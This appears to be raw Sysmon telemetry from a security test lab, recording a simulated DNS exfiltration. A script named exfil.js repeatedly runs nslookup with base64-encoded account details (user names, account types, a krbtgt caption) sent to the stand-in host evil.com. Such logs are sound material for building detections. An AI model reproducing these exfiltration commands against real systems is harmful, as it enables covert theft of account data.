14:21:51.105{2E1864BB-18E0-629A-6742-000000005F02}39765044C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-5446-000000005F02}6156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.117{2E1864BB-18FF-629A-5446-000000005F02}6156C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhjudb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.105{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvuhfy.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.068{2E1864BB-18FF-629A-5246-000000005F02}59607184C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5346-000000005F02}7540C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.068{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.068{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.068{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.068{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.068{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5346-000000005F02}7540C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.068{2E1864BB-18FF-629A-5146-000000005F02}53847692C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-5346-000000005F02}7540C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.079{2E1864BB-18FF-629A-5346-000000005F02}7540C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-5146-000000005F02}5384C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvuhfy.tmp 2>&1 10341000x8000000000000000215532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.052{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5246-000000005F02}5960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.052{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5246-000000005F02}5960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.037{2E1864BB-18FF-629A-5246-000000005F02}59607184C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5146-000000005F02}5384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.037{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5246-000000005F02}5960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.021{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5146-000000005F02}5384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.021{2E1864BB-18E0-629A-6742-000000005F02}39765012C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-5146-000000005F02}5384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.034{2E1864BB-18FF-629A-5146-000000005F02}5384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvuhfy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.021{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaelzov.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.005{2E1864BB-18FE-629A-4F46-000000005F02}61924288C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5046-000000005F02}6000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.005{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.005{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.005{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.005{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5046-000000005F02}6000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.005{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.005{2E1864BB-18FE-629A-4E46-000000005F02}59882132C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-5046-000000005F02}6000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.007{2E1864BB-18FF-629A-5046-000000005F02}6000C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-4E46-000000005F02}5988C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaelzov.tmp 2>&1 354300x800000000000000044908Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.774{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52388-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 